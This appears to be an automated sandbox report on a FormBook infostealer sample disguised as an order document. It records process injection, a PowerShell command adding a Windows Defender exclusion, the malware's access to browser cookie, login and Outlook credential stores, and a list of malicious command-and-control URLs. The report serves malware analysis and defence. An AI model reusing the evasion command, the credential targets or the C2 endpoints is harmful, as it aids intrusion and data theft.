            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: NULL target: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\compact.exeThread register set: target process: 404Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\compact.exeThread APC queued: target process: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess created: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"Jump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: EUSOiCcoIEEJJ.exe, 00000009.00000000.2432222159.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000002.4571003137.00000000011F1000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000000.2574330304.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: EUSOiCcoIEEJJ.exe, 00000009.00000000.2432222159.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000002.4571003137.00000000011F1000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000000.2574330304.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: EUSOiCcoIEEJJ.exe, 00000009.00000000.2432222159.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000002.4571003137.00000000011F1000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000000.2574330304.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: EUSOiCcoIEEJJ.exe, 00000009.00000000.2432222159.00000000011F0000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000002.4571003137.00000000011F1000.00000002.00000001.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000000.2574330304.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeQueries volume information: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\compact.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467083 Sample: Art_Spec. 4008670601 AZTEK ... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 35 www.hellokong.xyz 2->35 37 www.superunicornpalace.com 2->37 39 18 other IPs or domains 2->39 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for submitted file 2->51 55 8 other signatures 2->55 10 Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe 4 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 Art_Spec. 40086706... _ 7.3.2024.exe.log, ASCII 10->33 dropped 67 Adds a directory exclusion to Windows Defender 10->67 69 Injects a PE file into a foreign processes 10->69 14 Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 EUSOiCcoIEEJJ.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 conhost.exe 17->22         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 24 compact.exe 13 19->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 EUSOiCcoIEEJJ.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 www.hellokong.xyz 203.161.49.220, 49745, 49746, 49747 VNPT-AS-VNVNPTCorpVN Malaysia 27->41 43 epicbazaarhub.com 192.185.208.8, 49736, 49737, 49738 UNIFIEDLAYER-AS-1US United States 27->43 45 11 other IPs or domains 27->45 71 Found direct / indirect Syscall (likely to bypass EDR) 27->71 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe24%ReversingLabsWin32.Trojan.Generic
            Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
            http://www.architect-usschool.com/s24g/100%Avira URL Cloudmalware
            http://www.artvectorcraft.store/s0j2/?OdjTHtuX=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Y6vp=3PLd8j0%Avira URL Cloudsafe
            http://architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD100%Avira URL Cloudmalware
            http://www.epicbazaarhub.com/2769/0%Avira URL Cloudsafe
            http://www.hellokong.xyz/oui5/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://searchdiscovered.com/__media__/images/logo.gif)0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%Avira URL Cloudsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://i2.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
            http://www.hondamechanic.today/pv57/0%Avira URL Cloudsafe
            http://www.architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=100%Avira URL Cloudmalware
            http://www.tedjp-x.com/rxdf/?OdjTHtuX=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Y6vp=3PLd8j0%Avira URL Cloudsafe
            http://www.tedjp-x.com/rxdf/0%Avira URL Cloudsafe
            http://epicbazaarhub.com/2769/?OdjTHtuX=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm40%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
            https://www.namecheap.com/domains/registration/results/?domain=easybackpage.net0%Avira URL Cloudsafe
            http://www.rz6grmvv.shop/wvam/0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/display.cfm0%Avira URL Cloudsafe
            http://www.3cubesinterior.in/n8zi/0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/Moravia.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2FFitbFc0%Avira URL Cloudsafe
            http://www.fondazionegtech.org/jmiz/?Y6vp=3PLd8j&OdjTHtuX=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do=0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/Christmas_City_Studio.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix100%Avira URL Cloudmalware
            https://hao7.vip0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/92z0/?OdjTHtuX=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Y6vp=3PLd8j0%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            https://support.hostgator.com/0%Avira URL Cloudsafe
            http://www.superunicornpalace.com/mwa4/0%Avira URL Cloudsafe
            http://www.easybackpage.net/3jr0/?OdjTHtuX=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Y6vp=3PLd8j0%Avira URL Cloudsafe
            http://www.rz6grmvv.shop/wvam/?Y6vp=3PLd8j&OdjTHtuX=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4=0%Avira URL Cloudsafe
